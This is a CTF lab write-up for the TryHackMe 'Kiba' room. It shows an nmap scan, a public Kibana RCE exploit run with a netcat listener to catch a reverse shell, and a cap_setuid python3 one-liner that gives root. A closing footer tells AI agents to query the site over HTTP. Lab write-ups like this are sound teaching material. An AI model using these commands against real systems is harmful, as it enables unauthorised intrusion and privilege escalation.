# Kiba

### Target Details

Target IP: 10.10.252.150

### Scan Target

* Run Usual Nmap scan command

{% code overflow="wrap" %}

```bash
$ nmap -sCV -Pn -oN nmap.txt 10.10.252.150
$ cat nmap.txt
Nmap scan report for 10.10.252.150
Host is up (0.39s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 9df8d157132481b6185d048ed2384f90 (RSA)
|   256 e1e67aa1a11cbe03d24e271b0d0aecb1 (ECDSA)
|_  256 2abae5c5fb51381745e7b154caa1a3fc (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /opt/homebrew/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 15 12:19:16 2023 -- 1 IP address (1 host up) scanned in 114.46 seconds
```

{% endcode %}

* Nmap didn't captured other open ports. since we know the room is related to kibana, we can search for it kibana port. After quick search, We can find that kibana runs on port: 5601
* Hosted Services Summary

| Port | Service           |
| ---- | ----------------- |
| 22   | Open SSH service  |
| 80   | Apache Web Server |
| 5601 | Kibana            |

### Navigating Kibana

Visit Kibana Dashboard hosted on <http://10.10.252.150:5601>&#x20;

&#x20;

<figure><img src="https://2817478997-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fkw6htGm9vTsiShhRVeX3%2Fuploads%2Ft1WXvfhMdUBsSIJNEAtJ%2Fimage.png?alt=media&#x26;token=4a1039b7-3be9-4c89-aad5-6e5e1a25ee9c" alt=""><figcaption><p>Kibana Dashboard</p></figcaption></figure>

* We're logged in as default user. and Management tab seems interesting.
* Navigate to management tab

<figure><img src="https://2817478997-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fkw6htGm9vTsiShhRVeX3%2Fuploads%2FV2dnYMIfyquK8WJw2CA0%2Fimage.png?alt=media&#x26;token=f149e3f2-9887-4cac-ae67-8231bcecfe19" alt=""><figcaption><p>Found Version</p></figcaption></figure>

### Searching for Kibana Vulnerabilities and Exploits

* Search for kibana exploits on your favorite search engine
* Found vulnerability with RCE details hosted on tenable.

<figure><img src="https://2817478997-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fkw6htGm9vTsiShhRVeX3%2Fuploads%2FyXdcwukxA05399cNeK1h%2Fimage.png?alt=media&#x26;token=d4639911-08c9-46b9-9322-116bcdabc74e" alt=""><figcaption><p>Exploit Details on Tenable</p></figcaption></figure>

* On Reading Analysis we find that P{REDACTED} P{REDACTION} vulnerability was exploited to gain reverse shell.

### Exploiting Kibana RCE Vuln

* Exploit Script link can also be found on the tenable page.
* Clone Github repo
* To use the script with python3 change `content.data` -> `content.data.decode('utf-8')`
* Start netcat listener to catch Reverse Shell.

```bash
nc -nlvp 1234
```

* Run exploit

{% code overflow="wrap" %}

```bash
./CVE-XXXX-XXXX-kibana-rce.py -u http://10.10.252.150:5601 -host [YOUR_THM_IP] -p 1234 --shell
```

{% endcode %}

* Now, we've successfully received reverse shell on our machine

```bash
$ nc -nlvp 1234
Connection from 10.10.252.150:34696
bash: cannot set terminal process group (942): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

kiba@ubuntu:/home/kiba/kibana/bin$
```

### Capturing Flags

* Get user.txt flag

```bash
kiba@ubuntu:/home/kiba/kibana/bin$ cd ~
kiba@ubuntu:/home/kiba$ ls
elasticsearch-6.5.4.deb  kibana  user.txt
kiba@ubuntu:/home/kiba$ cat user.txt
cat user.txt
THM{REDACTED}
kiba@ubuntu:/home/kiba$
```

* On quickly searching for how to get capabilities list ubuntu. I found the useful command. Execute on captured shell.

```bash
$ getcap -r /
/home/kiba/.hackmeplease/python3 = cap_setuid+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
```

* `.hackmeplease` is providing us hint that we need to use `python3`binary. On researching cap\_setuid+ep permission allows to set uid.&#x20;
* If we set uid to 0 using python they we'll be able to run python commands and spawn a shell. python `os` module can be used to set uid.

```bash
/home/kiba/.hackmeplease/python3 -c "import os,pty; os.setuid(0); pty.spawn('/bin/bash');"
```

* Read root flag

```bash
root@ubuntu# cat /root/root.txt
THM{REDACTED}
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://dmdhrumilmistry.gitbook.io/home/blog/tryhackme-writeups/kiba.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.